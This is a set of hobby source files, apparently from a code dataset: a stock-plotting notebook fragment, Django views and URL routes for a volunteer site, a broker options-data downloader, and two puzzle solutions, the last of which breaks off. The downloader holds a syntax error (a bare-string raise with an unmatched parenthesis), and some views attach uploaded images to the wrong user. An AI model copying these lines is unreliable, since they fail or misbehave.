\ndf.groupby(df.index.day).mean().plot(y='Volume',ax=ax1,xlabel='Day')\ndf.groupby(df.index.month).mean().plot(y='Volume',ax=ax2,xlabel='Month')\ndf.groupby(df.index.year).mean().plot(y='Volume',ax=ax3,xlabel='Year')\n\n\n# # Top 5 Dates with Highest stock price\n\n# In[14]:\n\n\na=df.sort_values(by='High', ascending=False).head(5)\na['High']\n\n\n# # Top 5 Dates with Lowest stock price\n\n# In[15]:\n\n\nb=df.sort_values(by='Low', ascending=True).head(5)\nb['Low']\n\n\n# In[19]:\n\n\nfig,axes=plt.subplots(nrows=1, ncols=2,sharex=True, figsize=(12,5))\nfig.suptitle('High & Low values stock per period of time', fontsize=18)\nsns.lineplot(ax=axes[0], y=df['High'],x=df.index, color='green')\nsns.lineplot(ax=axes[1], y=df['Low'],x=df.index, color='red')\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"pranalivalve1108/Python-Projects","sub_path":"NFLIX.py","file_name":"NFLIX.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"1122965432","text":"from pprint import pprint\n\nfrom django.shortcuts import render, redirect, reverse, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nimport datetime\n\nfrom .models import Location, StatusUsersLocations, LogsStatusUsersLocations, User, AttendeesEvents, Event\nfrom .views_events import events_list\nfrom .forms import StatusUsersLocationsForm, UserProfileForm, MessagesEventsForm, MessagesEventsSimpleForm\nfrom .functions_global import get_date_to, forbidden_to_user, admin_only\nfrom .views_messages import get_to_user_messages, get_from_user_messages\n\n\n@login_required(login_url='/login/')\ndef index(request):\n\n to_user_messages = get_to_user_messages(request.user)\n from_user_messages = get_from_user_messages(request.user)\n\n user_distrib_pre = StatusUsersLocations.objects.filter(user=request.user, status=1) | \\\n StatusUsersLocations.objects.filter(user=request.user, status=2)\n distrib_user_choice = [i.distrib for i in user_distrib_pre if not i.distrib.is_cancelled]\n distrib_attendees = [i.parent_event for i in AttendeesEvents.objects.filter(user=request.user)]\n distrib = [i for i in distrib_user_choice]\n for i in distrib_attendees:\n if i not in distrib and not i.is_cancelled:\n distrib.append(i)\n\n if StatusUsersLocations.objects.filter(user=request.user, status=1):\n pending_events = StatusUsersLocations.objects.filter(user=request.user, status=1)\n else:\n pending_events = None\n\n events_user_manager = [i for i in Event.objects.all() if request.user in i.event_managers.all()]\n pending_approval_in_events = StatusUsersLocations.objects.filter(status=1, distrib__in=events_user_manager)\n if len(pending_approval_in_events) > 0:\n users_to_approve = True\n distrib_users_to_approve = pending_approval_in_events[0].distrib.uuid\n else:\n users_to_approve = False\n distrib_users_to_approve = None\n\n attendees = AttendeesEvents.objects.filter(user=request.user)\n\n eligible_events_date_locations_attendees_final = events_list(date_from=None, date_to=None, location=None, distrib=None, event_manager=None, attendance=True, user_requester=request.user)\n\n date_to = datetime.datetime.now() - datetime.timedelta(days=1) + datetime.timedelta(weeks=8)\n events_manager = events_list(date_from=None, date_to=date_to, location=None, event_manager=request.user, distrib=None)\n message_form = MessagesEventsForm()\n return render(request, 'index.html', context={\"events\": eligible_events_date_locations_attendees_final,\n \"date_to\": 
date_to, \"pending_events\":pending_events,\n \"attendees\": attendees, \"events_manager\": events_manager,\n \"message_form\": message_form, \"to_user_messages\": to_user_messages,\n \"from_user_messages\": from_user_messages,\n \"users_to_approve\":users_to_approve,\n \"distrib_users_to_approve\":distrib_users_to_approve})\n\n\ndef faq_view(request):\n return render(request, 'faq.html')\n\n\n@login_required(login_url='/login/')\n@admin_only\ndef all_users_site(request):\n users = User.objects.all().order_by('first_name')\n form = StatusUsersLocationsForm()\n message_form = MessagesEventsSimpleForm()\n status_users_location = StatusUsersLocations.objects.all().order_by('user__first_name')\n # status_users_location = StatusUsersLocations.objects.filter(status=1) | StatusUsersLocations.objects.filter(status=2)\n return render(request, 'benevoles.html', context={\"status_users_location\": status_users_location, \"form\": form, \"users\":users, \"message_form\":message_form})\n\n\n@login_required(login_url='/login/')\n@forbidden_to_user\ndef users_site(request, location_id):\n if request.user.user_type == 3 and Location.objects.get(uuid=location_id) not in Location.objects.filter(location_managers=request.user):\n return redirect('index')\n else:\n status_users_location = StatusUsersLocations.objects.filter(location=Location.objects.get(uuid=location_id),\n status=1) | StatusUsersLocations.objects.filter(\n location=Location.objects.get(uuid=location_id), status=2)\n users_pre = [i.user for i in status_users_location.order_by('user__first_name')]\n users=[]\n for i in users_pre:\n if i not in users:\n users.append(i)\n\n form = StatusUsersLocationsForm()\n message_form = MessagesEventsSimpleForm()\n\n if request.method == \"POST\":\n try:\n user_status_update = StatusUsersLocations.objects.get(uuid=request.GET['id'])\n except:\n pass\n else:\n user_status_update.status = 2\n user_status_update.save()\n logs = LogsStatusUsersLocations(location=user_status_update.location, from_user=request.user, user=user_status_update.user, status=2, current_status=user_status_update.status)\n logs.save()\n return redirect(reverse('users_site', kwargs={'location_id': location_id}))\n return render(request, 'benevoles_site.html', context={'location_id': location_id, \"status_users_location\": status_users_location, \"form\": form, \"users\":users, \"message_form\":message_form})\n\n\n@login_required(login_url='/login/')\n@forbidden_to_user\ndef user_site_update_status(request, location_id):\n if request.method == \"POST\":\n try:\n user_status_update = StatusUsersLocations.objects.get(uuid=request.GET['id'])\n except:\n pass\n else:\n user_status_update.status = request.POST['status']\n user_status_update.save()\n logs = LogsStatusUsersLocations(location=user_status_update.location, from_user=request.user, user=user_status_update.user, status=request.POST['status'], current_status=user_status_update.status)\n logs.save()\n return redirect(reverse('users_site', kwargs={'location_id': location_id}))\n return redirect('index')\n\n\n@login_required(login_url='/login/')\ndef profile(request):\n message_form = MessagesEventsSimpleForm()\n date_to = get_date_to()\n user_distrib_pre = StatusUsersLocations.objects.filter(user=request.user, status=1) | StatusUsersLocations.objects.filter(user=request.user, status=2)\n user_distrib = [i for i in user_distrib_pre if not i.distrib.is_cancelled]\n # user_locations = [i.location for i in user_locations_pre]\n user_manager_locations = 
Location.objects.filter(location_managers=request.user)\n return render(request, 'profile.html', context={'distrib': user_distrib, \"date_to\":date_to,\n 'manager_locations': user_manager_locations,\"message_form\":message_form })\n\n\n\n@login_required(login_url='/login/')\ndef profile_edit(request):\n form = UserProfileForm(instance=request.user)\n if request.method == \"POST\":\n form = UserProfileForm(data=request.POST)\n if form.is_valid():\n updated_user = request.user\n try:\n image = request.FILES['profile_picture']\n except:\n pass\n else:\n request.user.save_image(image)\n finally:\n updated_user.first_name = form.cleaned_data['first_name']\n updated_user.last_name = form.cleaned_data['last_name']\n updated_user.email = form.cleaned_data['email']\n updated_user.address = form.cleaned_data['address']\n updated_user.city = form.cleaned_data['city']\n updated_user.zip_code = form.cleaned_data['zip_code']\n updated_user.tel = form.cleaned_data['tel']\n updated_user.save()\n return redirect('profile')\n return render(request, 'profile_edit.html', context={\"form\" : form})\n\n\n@login_required(login_url='/login/')\n@forbidden_to_user\ndef profile_edit_manager(request, user_id, distrib_id):\n distrib = get_object_or_404(Event, uuid=distrib_id)\n if request.user.user_type == 3 and Location.objects.get(uuid=distrib.location.uuid) not in Location.objects.filter(location_managers=request.user):\n return redirect('index')\n else:\n updated_user = get_object_or_404(User, uuid=user_id)\n form = UserProfileForm(instance=updated_user)\n if request.method == \"POST\":\n form = UserProfileForm(data=request.POST)\n if form.is_valid():\n try:\n image = request.FILES['profile_picture']\n except:\n pass\n else:\n request.user.save_image(image)\n finally:\n updated_user.first_name = form.cleaned_data['first_name']\n updated_user.last_name = form.cleaned_data['last_name']\n updated_user.email = form.cleaned_data['email']\n updated_user.address = form.cleaned_data['address']\n updated_user.city = form.cleaned_data['city']\n updated_user.zip_code = form.cleaned_data['zip_code']\n updated_user.tel = form.cleaned_data['tel']\n updated_user.save()\n return redirect(reverse('distrib_users', kwargs={'distrib_id': distrib_id}))\n return render(request, 'profile_edit_manager.html', context={\"form\" : form, \"distrib\":distrib, \"user\":updated_user})\n\n\n@login_required(login_url='/login/')\n@admin_only\ndef profile_edit_admin(request, user_id):\n updated_user = get_object_or_404(User, uuid=user_id)\n form = UserProfileForm(instance=updated_user)\n if request.method == \"POST\":\n form = UserProfileForm(data=request.POST)\n if form.is_valid():\n try:\n image = request.FILES['profile_picture']\n except:\n pass\n else:\n request.user.save_image(image)\n finally:\n updated_user.first_name = form.cleaned_data['first_name']\n updated_user.last_name = form.cleaned_data['last_name']\n updated_user.email = form.cleaned_data['email']\n updated_user.address = form.cleaned_data['address']\n updated_user.city = form.cleaned_data['city']\n updated_user.zip_code = form.cleaned_data['zip_code']\n updated_user.tel = form.cleaned_data['tel']\n updated_user.save()\n return redirect(reverse('all_users_site'))\n return render(request, 'profile_edit_admin.html', context={\"form\": form, \"user\": 
updated_user})\n","repo_name":"tbonnard/association_benevoles","sub_path":"monespace/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"17059918768","text":"\"\"\"Script to download options data from Think or Swim (ToS) API.\"\"\"\n\n# Standard libraries\nimport pickle\nfrom datetime import datetime\nimport logging\nimport os\nimport time\nfrom typing import Dict, List\nfrom json.decoder import JSONDecodeError\nimport csv\nimport requests\nfrom requests.exceptions import ReadTimeout\nfrom urllib3.exceptions import ProtocolError\n\n# External dependencies\nfrom pymongo import MongoClient, ASCENDING\nfrom pymongo.errors import DuplicateKeyError\n\n# Application-specific imports\n\n# Constants\nTOS_OPTION_CHAIN_API_URL = \"https://api.tdameritrade.com/v1/marketdata/chains\"\nTOS_DOWNLOAD_DIR = \"/Users/edsonfox/Documents/Trading/Historical_Options_Data/ToS/\"\nCBOE_SYMBOLS_URL = \"http://markets.cboe.com/us/options/symboldir/equity_index_options/?download=csv\"\nMANDATORY_SYMBOLS = [\n \"A\",\n \"AAPL\",\n \"ABBV\",\n \"ABT\",\n \"ACN\",\n \"ADBE\",\n \"ADM\",\n \"ADP\",\n \"AFL\",\n \"AIG\",\n \"ALB\",\n \"ALL\",\n \"AMCR\",\n \"AMGN\",\n \"AMZN\",\n \"AOS\",\n \"APD\",\n \"ATO\",\n \"AXP\",\n \"AZO\",\n \"BA\",\n \"BAC\",\n \"BDX\",\n \"BEN\",\n \"BF.B\",\n \"BIIB\",\n \"BK\",\n \"BKNG\",\n \"BKX\",\n \"BLK\",\n \"BMY\",\n \"BNS\",\n \"BRK.B\",\n \"BYND\",\n \"C\",\n \"CAH\",\n \"CAT\",\n \"CB\",\n \"CHTR\",\n \"CINF\",\n \"CL\",\n \"CLX\",\n \"CLDT\",\n \"CMCSA\",\n \"CNP\",\n \"CMG\",\n \"COF\",\n \"COP\",\n \"COST\",\n \"CSCO\",\n \"CTAS\",\n \"CVS\",\n \"CVX\",\n \"CZNC\",\n \"D\",\n \"DD\",\n \"DHR\",\n \"DIA\",\n \"DIS\",\n \"DJX\",\n \"DOV\",\n \"DOW\",\n \"DUK\",\n \"ECL\",\n \"ED\",\n \"EEM\",\n \"EMN\",\n \"EMR\",\n \"ESS\",\n \"EWW\",\n \"EWZ\",\n \"EXC\",\n \"EXPD\",\n \"EXPE\",\n \"F\",\n \"FB\",\n \"FDX\",\n \"FRT\",\n \"FXI\",\n \"GD\",\n \"GDX\",\n \"GE\",\n \"GEO\",\n \"GILD\",\n \"GLD\",\n \"GM\",\n \"GOOG\",\n \"GOOGL\",\n \"GPC\",\n \"GS\",\n \"GWW\",\n \"HAL\",\n \"HD\",\n \"HGX\",\n \"HON\",\n \"HRL\",\n \"HSBC\",\n \"IBM\",\n \"INTC\",\n \"IP\",\n \"ITW\",\n \"IWM\",\n \"IYR\",\n \"JNJ\",\n \"JNUG\",\n \"JPM\",\n \"KEY\",\n \"KHC\",\n \"KMB\",\n \"KMI\",\n \"KO\",\n \"KR\",\n \"KTB\",\n \"LEG\",\n \"LIN\",\n \"LLY\",\n \"LMT\",\n \"LOW\",\n \"LYB\",\n \"LYFT\",\n \"M\",\n \"MA\",\n \"MCD\",\n \"MDLZ\",\n \"MDT\",\n \"MET\",\n \"MKC\",\n \"MMM\",\n \"MO\",\n \"MPC\",\n \"MRK\",\n \"MS\",\n \"MSFT\",\n \"NDX\",\n \"NEE\",\n \"NFLX\",\n \"NGG\",\n \"NKE\",\n \"NNN\",\n \"NOV\",\n \"NUE\",\n \"NVDA\",\n \"O\",\n \"ODP\",\n \"OEX\",\n \"OHI\",\n \"OIH\",\n \"OMC\",\n \"ORCL\",\n \"OSX\",\n \"OXY\",\n \"OZK\",\n \"PBCT\",\n \"PEAK\",\n \"PEB\",\n \"PEP\",\n \"PFE\",\n \"PG\",\n \"PM\",\n \"PNR\",\n \"PPG\",\n \"PPL\",\n \"PYPL\",\n \"QCOM\",\n \"QQQ\",\n \"RLG\",\n \"RLV\",\n \"ROP\",\n \"ROST\",\n \"RUI\",\n \"RUT\",\n \"SBUX\",\n \"SHW\",\n \"SIXB\",\n \"SIXI\",\n \"SIXM\",\n \"SIXRE\",\n \"SIXU\",\n \"SIXV\",\n \"SKT\",\n \"SLB\",\n \"SLV\",\n \"SMH\",\n \"SO\",\n \"SOX\",\n \"SPG\",\n \"SPGI\",\n \"SPY\",\n \"SPX\",\n \"STAG\",\n \"SWK\",\n \"SYY\",\n \"T\",\n \"TAN\",\n \"TGT\",\n \"TLT\",\n \"TROW\",\n \"TSLA\",\n \"TXN\",\n \"UBER\",\n \"UNH\",\n \"UNP\",\n \"UPS\",\n \"USB\",\n \"USO\",\n \"UTY\",\n \"V\",\n \"VFC\",\n \"VIAC\",\n \"VIACA\",\n \"VIX\",\n \"VTR\",\n \"VZ\",\n \"WBA\",\n \"WDC\",\n \"WELL\",\n \"WFC\",\n \"WMT\",\n 
\"WPC\",\n \"WRK\",\n \"X\",\n \"XAU\",\n \"XBI\",\n \"XDA\",\n \"XDB\",\n \"XDC\",\n \"XDE\",\n \"XDN\",\n \"XDS\",\n \"XDZ\",\n \"XEO\",\n \"XLB\",\n \"XLE\",\n \"XLP\",\n \"XLU\",\n \"XLY\",\n \"XOM\",\n \"XOP\",\n \"XRT\",\n \"XSP\",\n]\n\n\nclass OptionsDataDownloader:\n \"\"\"OptionsDataDownloader downloads data from ToS API and stores it in a DB.\"\"\"\n\n def __init__(self):\n self.session = requests.session()\n self.db_handle = None\n\n def connect_and_initialize_db(self):\n if not self.db_handle:\n client = MongoClient()\n self.db_handle = client.options\n self.db_handle.options_data.create_index([(\"dataDate\", ASCENDING), (\"symbol\", ASCENDING)], unique=True)\n\n def get_and_pickle_data(self, symbols: List, path: str = \"\") -> List[str]:\n failed_symbols = []\n today_str = datetime.now().strftime(\"%Y%m%d\")\n path += today_str\n try:\n os.mkdir(path)\n except FileExistsError:\n logging.info(\"%s directory already exists\", today_str)\n for symbol in symbols:\n if [i for i in os.listdir(path) if i.startswith(symbol + \"_\")]:\n logging.info(\"%s already present, skipping\", symbol)\n continue\n data = self.get_option_chain_from_broker(symbol)\n if data[\"status\"] == \"FAILED\":\n logging.debug(\"Trying $%s.X\", symbol)\n data = self.get_option_chain_from_broker(\"$\" + symbol + \".X\")\n if data[\"status\"] == \"FAILED\":\n logging.info(\"%s FAILED!\", symbol)\n failed_symbols.append(symbol)\n continue\n with open(path + \"/\" + symbol + \"_\" + today_str + \"_data.pkl\", \"wb\") as p_data:\n pickle.dump(data, p_data)\n return failed_symbols\n\n def pickle_to_db(self, folder=None):\n self.connect_and_initialize_db()\n folder = datetime.now().strftime(\"%Y%m%d\") if folder is None else folder\n number_of_docs_before = self.db_handle.options_data.estimated_document_count()\n pkls = [i for i in os.listdir(folder) if i.endswith(\".pkl\")]\n pkls.sort()\n total_contracts = 0\n hod_data_list = []\n for pkl_file in pkls:\n with open(folder + \"/\" + pkl_file, \"rb\") as p_data:\n tos_data = pickle.load(p_data)\n total_contracts = total_contracts + tos_data[\"numberOfContracts\"]\n date_str = pkl_file.split(\"_\")[1]\n hod_data = tos_to_hod(tos_data, date_str)\n hod_data_list.append(hod_data)\n try:\n insert_result = self.db_handle.options_data.insert_one(hod_data)\n logging.debug(\"Inserted %s with id %s\", hod_data[\"symbol\"], insert_result.inserted_id)\n except DuplicateKeyError:\n logging.info(\"Document for %s from %s already in DB\", hod_data[\"symbol\"], hod_data[\"dataDate\"])\n continue\n hod_data_to_csv(hod_data_list, folder)\n logging.info(\"Converted %s contracts from ToS to HoD format\", total_contracts)\n number_of_docs_after = self.db_handle.options_data.estimated_document_count()\n logging.info(\"Inserted %s new documents to DB\", number_of_docs_after - number_of_docs_before)\n\n def csv_folder_to_db(self, folder_prefix, symbols=None, starting_path: str = \"\"):\n folders = [x for x in os.listdir(starting_path) if x.startswith(folder_prefix)]\n for folder in folders:\n path = starting_path + \"/\" + folder if starting_path else folder\n files = [x for x in os.listdir(path) if x.startswith(\"L2_options_\")]\n for file in files:\n path = \"/\".join([starting_path if starting_path else os.getcwd(), folder, file])\n self.csv_to_db(path, symbols)\n\n def csv_to_db(self, csv_path, symbols=None):\n self.connect_and_initialize_db()\n number_of_docs_before = self.db_handle.options_data.estimated_document_count()\n with open(csv_path) as csv_file:\n logging.info(\"Now 
processing %s\", csv_path)\n reader = csv.DictReader(csv_file)\n inserted_symbols = {}\n num_rows = 0\n for row in reader:\n current_symbol = row[\"UnderlyingSymbol\"]\n if symbols is None or current_symbol in symbols:\n num_rows = num_rows + 1\n try:\n inserted_symbols[current_symbol].append(row)\n except KeyError:\n inserted_symbols[current_symbol] = [row]\n for symbol in inserted_symbols:\n data = {}\n data[\"symbol\"] = symbol\n data_date = datetime.strptime(inserted_symbols[symbol][0][\"DataDate\"], \"%m/%d/%Y\")\n data[\"dataDate\"] = data_date.strftime(\"%Y%m%d\")\n data[\"chain\"] = inserted_symbols[symbol]\n try:\n insert_result = self.db_handle.options_data.insert_one(data)\n logging.info(\n \"Inserted %s with id %s\", data[\"symbol\"], insert_result.inserted_id,\n )\n except DuplicateKeyError:\n logging.info(\n \"Document for %s from %s already exists in DB\", data[\"symbol\"], data[\"dataDate\"],\n )\n number_of_docs_after = self.db_handle.options_data.estimated_document_count()\n logging.info(\n \"Inserted %s new dowcuments from %s CSV rows\", number_of_docs_after - number_of_docs_before, num_rows,\n )\n\n def get_option_chain_from_broker(self, symbol: str, retries: int = 60) -> Dict:\n while retries:\n try:\n response = self.session.get(\n TOS_OPTION_CHAIN_API_URL\n + \"?apikey=\"\n + os.environ.get(\"TOS_API_KEY\")\n + \"&symbol=\"\n + symbol\n + \"&includeQuotes=TRUE\",\n timeout=32,\n )\n except (ConnectionError, ReadTimeout, requests.exceptions.ConnectionError) as error:\n try:\n logging.error(\"Failed getting option chain for %s: %s\", symbol, error)\n except ProtocolError as p_error:\n try:\n logging.error(\"Failed getting option chain for %s: %s\", symbol, p_error)\n except (requests.exceptions.RequestException, requests.exceptions.ConnectionError,) as r_error:\n logging.error(\"Failed getting option chain for %s: %s\", symbol, r_error)\n retries = retries - 1\n time.sleep(2)\n continue\n try:\n data = response.json()\n except JSONDecodeError as error:\n logging.error(\"Failed to get JSON from %s response: %s\", symbol, error)\n retries = retries - 1\n time.sleep(2)\n continue\n if \"status\" in data.keys():\n return data\n if \"error\" in data.keys():\n logging.info(\"[%s]: %s\", symbol, data[\"error\"])\n else:\n logging.warning(\"Data has no status or error: %s\", data)\n retries = retries - 1\n time.sleep(2)\n return {}\n\n def get_symbols_in_db(self) -> List[str]:\n self.connect_and_initialize_db()\n symbols_in_db = self.db_handle.options_data.distinct(\"symbol\")\n logging.debug(\"Found %s symbols in DB: %s\", len(symbols_in_db), symbols_in_db)\n return symbols_in_db\n\n def get_todays_data(self, path: str = \"\"):\n symbols = self.get_symbols_in_db()\n for try_num in range(2):\n logging.info(\"Trial number %s\", try_num)\n symbols = self.get_and_pickle_data(symbols, path)\n logging.info(\"Got %s failing symbols: %s\", len(symbols), symbols)\n self.get_and_pickle_data(get_cboe_symbols(), path)\n symbols = MANDATORY_SYMBOLS\n for try_num in range(8):\n logging.info(\"Mandatory symbols: Trial number %s\", try_num)\n symbols = self.get_and_pickle_data(symbols, path)\n logging.info(\"Got %s failing symbols: %s\", len(symbols), symbols)\n if symbols:\n logging.error(\"**************************************************\")\n logging.error(\"COULD NOT GET THESE MANDATORY SYMBOLS: %s\", symbols)\n logging.error(\"**************************************************\")\n\n\ndef tos_to_hod(tos_data: dict, date_str: str) -> dict:\n hod_data = {}\n if 
tos_data[\"symbol\"].startswith(\"$\") and tos_data[\"symbol\"].endswith(\".X\"):\n symbol = tos_data[\"symbol\"][1:-2]\n else:\n symbol = tos_data[\"symbol\"]\n hod_data[\"symbol\"] = symbol\n hod_data[\"dataDate\"] = date_str\n logging.debug(\"Found %s contracts in ToS for %s\", tos_data[\"numberOfContracts\"], symbol)\n hod_data[\"chain\"] = []\n underlying_price = tos_data[\"underlying\"][\"last\"] if tos_data[\"underlying\"] else tos_data[\"underlyingPrice\"]\n for option_type in [\"callExpDateMap\", \"putExpDateMap\"]:\n for expiration_str, expiration_row in tos_data[option_type].items():\n expiration = expiration_str.split(\":\")[0].replace(\"-\", \"\")\n for strike, strike_list in expiration_row.items():\n hod_chain_row = {}\n hod_chain_row[\"UnderlyingSymbol\"] = symbol\n hod_chain_row[\"UnderlyingPrice\"] = str(underlying_price)\n for entry in strike_list:\n hod_chain_row[\"Exchange\"] = entry[\"exchangeName\"]\n hod_chain_row[\"OptionSymbol\"] = entry[\"symbol\"]\n hod_chain_row[\"OptionExt\"] = \"\"\n hod_chain_row[\"Type\"] = \"call\" if option_type == \"callExpDateMap\" else \"put\"\n hod_chain_row[\"Expiration\"] = (\"/\").join([expiration[4:6], expiration[6:8], expiration[0:4]])\n hod_chain_row[\"DataDate\"] = (\"/\").join([date_str[4:6], date_str[6:8], date_str[0:4]])\n hod_chain_row[\"Strike\"] = strike\n hod_chain_row[\"Last\"] = str(entry[\"last\"])\n hod_chain_row[\"Bid\"] = str(entry[\"bid\"])\n hod_chain_row[\"Ask\"] = str(entry[\"ask\"])\n hod_chain_row[\"Volume\"] = str(entry[\"totalVolume\"])\n hod_chain_row[\"OpenInterest\"] = str(entry[\"openInterest\"])\n try:\n hod_chain_row[\"IV\"] = str(round(entry[\"volatility\"] / 100, 2))\n except TypeError:\n hod_chain_row[\"IV\"] = \"NaN\"\n hod_chain_row[\"Delta\"] = str(entry[\"delta\"])\n hod_chain_row[\"Gamma\"] = str(entry[\"gamma\"])\n try:\n hod_chain_row[\"Theta\"] = str(round(entry[\"theta\"] * 100, 2))\n except TypeError:\n hod_chain_row[\"Theta\"] = \"NaN\"\n hod_chain_row[\"Vega\"] = str(round(entry[\"vega\"] * 100, 2))\n hod_chain_row[\"AKA\"] = entry[\"symbol\"]\n hod_data[\"chain\"].append(hod_chain_row)\n return hod_data\n\n\ndef hod_data_to_csv(hod_data: list, date_str: str):\n with open(\"options_\" + date_str + \".csv\", \"w\") as csv_file:\n csv_writer = csv.writer(csv_file)\n for symbol_data in hod_data:\n for row in symbol_data[\"chain\"]:\n csv_writer.writerow(row.values())\n\n\ndef get_cboe_symbols() -> List[str]:\n rows = requests.get(CBOE_SYMBOLS_URL).text.splitlines()\n symbols = []\n for row in rows:\n try:\n symbol_candidate = row.split('\",\"')[1]\n except IndexError:\n logging.info(\"Row is not parsable: %s\", row)\n continue\n if \"#\" not in symbol_candidate:\n symbols.append(symbol_candidate)\n symbols = list(set(symbols))\n symbols.sort()\n logging.info(\"Got %s symbols from CBOE\", len(symbols))\n if len(symbols) < 9000:\n raise \"Too few symbols. 
You should check what's going on\")\n return symbols\n\n\ndef replace_dots_in_keys(dictionary: Dict) -> Dict:\n new_dict = {}\n for key, value in dictionary.items():\n if isinstance(value, dict):\n value = replace_dots_in_keys(value)\n new_dict[key.replace(\".\", \",\")] = value\n return new_dict\n\n\ndef main():\n logging.getLogger().setLevel(logging.INFO)\n options_data_downloader = OptionsDataDownloader()\n while True:\n if datetime.now().weekday() < 5:\n today_str = datetime.now().strftime(\"%Y%m%d\")\n if today_str not in os.listdir(TOS_DOWNLOAD_DIR):\n if datetime.now().hour > 14:\n options_data_downloader.get_todays_data(TOS_DOWNLOAD_DIR)\n else:\n logging.info(\"Waiting until 3pm\")\n else:\n logging.info(\"%s directory already present\", today_str)\n else:\n logging.info(\"No trading today\")\n time.sleep(300)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"edsonfox/options-data-python","sub_path":"options_data_downloader.py","file_name":"options_data_downloader.py","file_ext":"py","file_size_in_byte":16326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71678914639","text":"# Given n names and phone numbers, assemble a phone book that maps friends' names to their respective phone numbers. \n# You will then be given an unknown number of names to query your phone book for. \n# For each name queried, print the associated entry from your phone book on a new line in the form name=phoneNumber; \n# if an entry for the name is not found, print Not found instead.\n\n# Number of key-value pairs\nn = int(input())\n\n# Loop through the number of pairs, appending the input into the names list\nnames = [input().split() for i in range(n)]\n\n# Loop through the list, inserting the key and val into the phone book dictionary\nphone_book = {key: val for key, val in names}\n\n# While there is still name input, check whether the name exists in the phone book\n# If it exists, print out the name and number\nwhile True:\n try:\n name = input()\n if name in phone_book:\n print(\"%s=%s\" % (name, phone_book[name]))\n else:\n print(\"Not found\")\n except EOFError:\n break","repo_name":"benedictusdps/hackerrank","sub_path":"Tutorial_30_Days_of_Code/Day_8/dictionaries_and_maps.py","file_name":"dictionaries_and_maps.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"21736763454","text":"from django.conf.urls.defaults import patterns, include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.decorators import login_required\nfrom tfb import views as base_views\nfrom tfb.messages import views as message_views\nfrom tfb.matchup import views as matchup_views\nfrom tfb.player_card import views as player_card_views\nfrom tfb.top_player_list import views as top_player_list\nfrom tfb.draft import views as draft_views\nfrom tfb.profile import views as profile_views\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^$', base_views.AboutView.as_view()),\n url(r'^about/$', base_views.AboutView.as_view()),\n\turl(r'^home/$', base_views.HomeView.as_view(), name='home'),\n\turl(r'^players/$', base_views.HomeView.as_view(), name='home'),\n\turl(r'^blue/$', base_views.BlankView.as_view(), name='blank'),\n\turl(r'^delete_account/$', profile_views.DeleteAccountView.as_view(), name='delete'),\n\turl(r'^player/(?P<player_id>\w+)/$', player_card_views.PlayerPageView.as_view(), name='player'),\n url(r'^uteam/(?P<team_id>\w+)/$', base_views.NotMyTeamView.as_view(), 
name='uteam'),\n url(r'^uteam/$', base_views.MyTeamView.as_view()),\n url(r'^myteam/$', login_required(base_views.MyTeamView.as_view()), name=\"myteam\"),\n url(r'^messages/$', message_views.MessageView.as_view(),name='message'),\n\turl(r'^league/$', login_required(base_views.league_page),name='league'),\n url(r'^league/(?P<league_id>\w+)/$', login_required(base_views.league_page),name='league'),\n url(r'^leagueadmin/$', base_views.leagueadmin,name='leagueadmin'),\n url(r'^leagueadmin/(?P<league_id>\w+)/$', base_views.leagueadmin,name='leagueadmin'),\n\turl(r'^login/$', 'django.contrib.auth.views.login'),\n\turl(r'^logout/$', base_views.logout_user,name='logout_user'),\n\turl(r'^profile/$', login_required(profile_views.ProfileView.as_view()), name='ProfileView'),\n url(r'^profile/edit/$', profile_views.EditAccountView.as_view(), name='profileedit'),\n\turl(r'^joinleague/$', base_views.joinleague,name='joinleague'),\n\turl(r'^pickup/(?P<player_id>\w+)/$', base_views.pickup,name='pickup'),\n\turl(r'^list/(?P<player_id>\w+)/$', base_views.list_player,name='list'),\n url(r'^draft/$', draft_views.draftpage, name='draftpage'),\n url(r'^drag/$', draft_views.drag_and_drop, name='draftpage'),\n url(r'^matchup/$', login_required(matchup_views.MatchupPageView.as_view()), name='matchup'),\n url(r'^matchup/(?P<matchup_id>\w+)/$', login_required(matchup_views.MatchupPageView.as_view()),name='matchup'),\n url(r'^sysadmin/$', base_views.sysadmin,name='sysadmin'),\n url(r'^sysadmin/(?P<action>\w+)/(?P<arg>.*?)$', base_views.sysadmin,name='sysadmin'),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^playerpage/$', top_player_list.playerpage),\n url(r'^playernotfound/$', top_player_list.PlayerNotFound.as_view()),\n url(r'^playerpage/(?P<player_name>\w+)', top_player_list.playerpage),\n url(r'^playerpage/(?P<player_name>\w+)', top_player_list.playerpage),\n url(r'^leaguelist/(?P<league_id>\w+)', base_views.league_list),\n url(r'^transactions/$', base_views.transactions_page),\n url(r'^accounts/', include('registration.backends.default.urls')),\n)\n","repo_name":"taddeimania/tfb","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"10105510273","text":"from io import TextIOWrapper\nfrom dataclasses import dataclass\nimport re\n\n\ndef abba(string: str) -> bool:\n    for i in range(len(string)-3):\n        if string[i] == string[i+3] and string[i+1] == string[i+2] and string[i] != string[i+1]:\n            return True\n    return False\n\n\ndef aba(string: str) -> set:\n    patterns = set()\n    for i in range(len(string)-2):\n        if string[i] == string[i+2] and string[i+1] != string[i+2]:\n            patterns.add(string[i:i+3])\n    return patterns\n\n\ndef main(file: TextIOWrapper):\n    ips = [line.strip() for line in file.readlines()]\n    abba_count = 0\n    aba_count = 0\n    for ip in ips:\n        found = False\n        parts = re.split(r'\\]|\\[', ip)\n        for i, part in enumerate(parts):\n            if i%2 == 0 and abba(part):\n                found = True\n            elif abba(part):\n                found = False\n                break\n        abba_count += found\n\n        non_bracket_aba = set()\n        bracket_aba = set()\n        for i, part in enumerate(parts):\n            if i%2 == 0:\n                non_bracket_aba |= 